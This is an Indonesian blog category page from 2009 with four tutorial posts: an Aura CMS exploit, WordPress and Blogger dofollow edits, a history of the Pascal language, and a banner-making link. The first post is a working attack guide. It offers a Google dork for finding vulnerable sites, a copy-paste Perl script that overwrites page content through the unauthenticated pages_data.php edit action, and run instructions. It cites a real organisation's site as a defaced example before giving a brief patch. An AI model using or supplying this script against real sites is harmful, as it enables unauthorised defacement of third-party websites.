News for the ‘Tutorial’ Category

Bugs Pada Aura CMS | Exploit Using Perl

wuiih.. lama saya ga posting artikel mengenai dunia yang di cap “hitam” alias “underwear” ( Baca : Gelap ). :B

ya, pada kesempatan kali ini saya akan memberikan info mengenai sebuah tekhnik exploit yang dapat digunakan terhadap Aura CMS. tepatnya pada file pages_data.php, ( bug ini udah ada cukup lama lo, sekitar agustus tahun lalu )

CMS karya anak bangsa ini ternyata juga tidak terhindar dari yang namanya “bugs”. wuiih.. ngeri ah, punya saudara sendiri kok di “Exploit” ? >:<

Tenang sahabat, disini saya cuma memberikan info aja kok, dan juga pada artikel ini juga akan dibahas bagaimana untuk mem”patch” bug tersebut, jadi tenang aja buat para sahabat blogger yang kebetulan menggunakan Aura CMS, malah kalian harus bangga lo, menggunakan produk dalam negeri. >U

Ya, mari kita memancing, sebelumnya kita harus caru cacingnya dulu ( baca : umpan ) :D

- ketik di google Powered By AuraCMS 2.22

- buka file pages_data.php nya, caranya ketik di address bar seperti ini :

http//www.target.com/js/pages/pages_data.php

ganti yang warna merah sesuai target yang didapat

- bila sitenya sudah di patch akan keluar kata-kata berikut

You Must Login First If Not Yet Have Account Please Register

- bila belum, biasanya kosong dan ada tulisan

{”pages”:[{"id":"1","judul":"blablabla"},{"id":"2","judul":"blablabla"},{"id":"3","blablabla":"blablabla"},{"id":"4","judul":"blablabla"},{"id":"5","judul":"blablabla"}],”pagging”:”"}

Kira-kira seperti itu,

- Selanjutanya siapkan sebuah script perl untuk exploitasinya, Oya sebelumnya bagi yang kompie-nya belum terinstall perl, bisa di donwload dulu disini >> CLICK HERE

berikut contoh script perl yang dibutuhkan :

use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Long;

my $isijudul = “ISI JUDUL”;
my $isikonten = “Isi Konten”;
my $ambilkue = “http://situstarget.com/index.php”;
my $kue = HTTP::Cookies->new();
my $hasil = “”;
my $browser = LWP::UserAgent->new;

$arbitrary = “http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=”;

$hasil = $browser->get($arbitrary);

$hasil = $browser->get($ambilkue);
$kue->extract_cookies($hasil);
$browser->cookie_jar($kue);

$arbitrary .= “1″;
$hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],);
$konten = $hasil->content;
print $konten ;

waw, kok ada smiley nya ?? tenang, ga pengaruh kok tinggal copy paste aja. :D.

berikut sedikit penjelasannya :

my $isijudul = “ISI JUDUL”;    >> ganti dengan judul yang sahabat inginkan

my $isikonten = “Isi Konten”; >>  Ganti dengan konten yang sahabat inginkan juga,

my $ambilkue = “http://situstarget.com/index.php”; >>   Ganti http://situstarget.com dengan situs asli target sahabat tadi.

$arbitrary = “http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=”;      >> Ganti HANYA http://situstarget.com saja !, sesuai target sahabat.

- Copy script diatas dan save dengan extensi .pl, lalu simpan di direktori yang mudah di ingat, ini hanya untuk mempermudah step selanjutnya.  >> contoh :    C:aura.pl

- buka command prompt, sebelumnya ketik perl -v untuk mengecek, apakah perl yang di download tadi sudah terinstall sebagaimana mestinya. Jika sudah terinstall akan keluar versi dari installer perl tersebut. :-)

- masuk ke direktori file aura.pl tadi ( udah tau kan caranya ? ),  misal ada di dir C, ketik aza   >>  cd C:

- jalankan file aura.pl tadi. caranya ketik >>   C:aura.pl

- lihat hasilnya, ……… Tara….!!, gimana sobat, berhasil kan ?, for example : http://www.pkpujogja.or.id/, ( maaf buat adminnya :D )

Ya, sekarang adalah bagaimana car mem-”patch” ( baca : tutup ) bug tersebut.

huff… setelah googling cukup lama, akhirnya dapat juga…

if(!cek_login()){

echo “Maaf anda tidak diperkenankan mengakses halaman ini”;

}else{

if (session_is_registered (’LevelAkses’) && $_SESSION['LevelAkses']==”Administrator”){


copy potongan script tersebut dan paste diatas code switch (@$_GET['action']){ pada file pages_data.php

lalu pada akhir halaman sebelum ?> (akhir TAG untuk php) beri tanda }} untuk menutup code yg sudah di copy tadi.

sekian sahabat, info dari saya kali ini, semoga bermanfaat, dan ingat, jangan disalahgunakan yah :O)

Thanks, Teatzo

Posted: April 24th, 2009
Categories: CMS, Hack, News & Info, Tutorial
Tags:
Comments: 6 Comments.

Membuat Blog Do Follow

Membuat Blog Do Follow, ya sesuai janji saya pada postingan sebelumnya, pada kesempatan ini, saya ingin membagi trik kepada para sahabat Blogger, bagaimana mengubah dan meyulap blog anda menjadi berstatus DoFollow.

Untuk pengertian dari Dofollow, bisa dibaca di artikel saya sebelumnya,

Ok, sahabat blogger, langsung aza yah.

UNTUK PENGGUNA WORDPRESS

- Masuk ke Cpanel blog kalian (Cpanel webhosting kalian)

- Masuk ke File manager (bisa menggunakan filezilla), masuk ke direktori dimana WP kalian diinstall.

- masuk ke direktori file wp-includes, disini akan ada 2 buah file yang perlu kita edit:

1. Perubahan pertama yang perlu dilakukan ada pada file comment-template.php, kira kira ada pada baris ke 148 ( menurut kebanyakan refferensi yang saya dapatkan ada di baris ke 47-48 ? ) cari tulisan  >>

$return = “<a href=’$url’ rel=’external nofollow‘ class=’url’>$author</a>”;

Hapus yang berwarna merah, ubah menjadi :

$return = “<a href=’$url’ rel=’external‘ class=’url’ target=’_blank’>$author</a>”;

script tersebut sudah saya modifikasi, sehingga bila link di klik, halaman blog kita tidak tertutup ^^.

2. perubahan kedua ada pada file default-filters.php, kira-kira pada baris 154, cari tulisan berikut :

add_filter(’pre_comment_content’, ‘wp_rel_nofollow’, 15);

Hapus atau tambahkan karakter “double slash” ( // ) di awal baris

//add_filter(’pre_comment_content’, ‘wp_rel_nofollow’, 15);

Bila sahabat tidak ingin repot, bisa juga kok pake plugins berikut..

KLIK DISINI

mungkin dalam hati sahabat bertanya “Lo, ternyata ada pluginnya, terus ngapain dari tadi kita bahas rumit-rumit gitu ?”

Ingat semuanya itu ada prosesnya, tidak ada yang instan di dunia ini ( Mi instan pun harus direbus dulu ^0^), Membuat blog DoFollow-pun begitu, disini Saya ingin berbagi tips N trik disertai penjelasan yang Nalar kepada sahabat blogger, so sekarang saya harap sahabat telah mengerti prosesnya dan bisa meng-aplikasikannya di blog para sahabat masing-masing. hehe ^^

UNTUK PENGGUNA BLOGGER

- Login ke blogger kamu

- kemudian pilih Layout

- pilih Edit HTML

- Download Full Template ( hanya untuk berjaga-jaga, bila terjadi kesalahan, bisa di restore seperti semula lagi)

- Centang >> Expand Widget Templates

- Cari 2 penggalan script berikut :

<a expr:href=’data:comment.authorUrl’ rel=’nofollow’><data:comment.author/></a>

<a expr:href=’data:backlink.url’ rel=’nofollow’><data:backlink.title/></a>\

Kalian Bisa hapus saja yang berwarna merah, atau diganti dengan kata ‘external’

<a expr:href=’data:comment.authorUrl’ rel=’external’><data:comment.author/></a>

<a expr:href=’data:backlink.url’ rel=’external’><data:backlink.title/></a>

-Simpan Template Dan Lihat !!

Ya, demikian tutorial dari saya kali ini, kutunggu komentarnya yah.

Thanks, Teatzo

Posted: April 23rd, 2009
Categories: Blog, Tutorial, tips & trick
Tags:
Comments: 11 Comments.

Sejarah Pascal

Pascal Pascal adalah bahasa tingkat tinggi (high level language) yang orientasinya pada segala tujuan, dirancang oleh Profesor Niklaus Wirth dari Technical University of Zurich, Switzerland. Nama Pascal diambil sebagai penghargaan terhadap Blaise Pascal, ahli matematik dan filosofer terkenal abad 17 dari Perancis.

Profesor Niklaus Wirth memperkenalkan kompiler bahasa Pascal pertama kali untuk komputer CDC 6000 (Control Data Corporation) yang dipublikasikan pada tahun 1971 dengan tujuan membantu mengajar program komputer secara sistematis, khususnya untuk memperkenalkan pemrograman terstruktur.

Dalam waktu singkat, Pascal telah menjadi bahasa yang populer di kalangan pelajar universitas dan merupakan bahasa yang diajarkan di beberapa perguruan tinggi. Beberapa profesional komputer juga mulai beralih ke bahasa Pascal. Kenyataannya, Pascal merupakan bahasa yang paling cepat populer dibandingkan dengan bahasa-bahasa komputer tingkat tinggi yang lainnya.

Standar Pascal adalah bahasa Pascal yang didefinisikan oleh K.Jensen dan Niklaus Wirth. Penerapan nyata dari standar Pascal banyak yang berbeda dengan seperti apa yang telah didefinisikan oleh K. Jensen dan Niklaus Wirth. Standar Pascal di Eropa didefinisiakn oelh ISO (International Standards Organization) dan di Amerika oleh kerjasama antara ANSI (American National Standar Institute) dengan IEEE (Intitute of Electrical and Electronic Engineer).

Beberapa versi dari Pascal yang telah beredar di pasaran, di antaranya UCSD pascal (University of California at San Diego Pascal), MS-Pascal (Microsoft Pascal), Apple Pascal, Turbo Pascal dan lain sebagainya. Sampai saat ini untuk komputer-komputer mikro dan personal, Turbo Pascal merupakan versi bahasa Pascal yang paling populer dan banyak digunakan. Kompiler Turbo Pascal banyak digemari, karena terutama bersifat interaktif, seperti interpreter saja layaknya. Selain itu Turbo Pascal mengikuti definisi dari standar Pascal seperti yang didefinisikan oleh K. Jensen dan Niklaus Wirth di Pascal User Manual dan Report. Turbo PASCAL adalah copyright dari Borland Inc. dan dapat digunakan pada sistem operasi PC-DOS, MS-DOS, CPM-86 dan CP/M-80. Berikut yang penulis pakai adalah Turbo Pascal versi 7.0.

sumber : Yogyafree

mm.. untuk mempraktekannya bisa menggunakan Free Pascal (FPC)

Posted: February 5th, 2009
Categories: News & Info, Tutorial
Tags:
Comments: 1 Comment.

Make Your Own Banner For Link Back !!, Fast And Free !!

OK.. this is another trick to make Banner on your Blog, without any Tools. !! and you can make it less than a Minute !!
Interested Huh..??

Ok, Just Click This Link CLICK HERE

There is for an Example

Thanks, Teatzo

Posted: February 3rd, 2009
Categories: Tools, Tutorial, Uncategorized, tips & trick
Tags:
Comments: 3 Comments.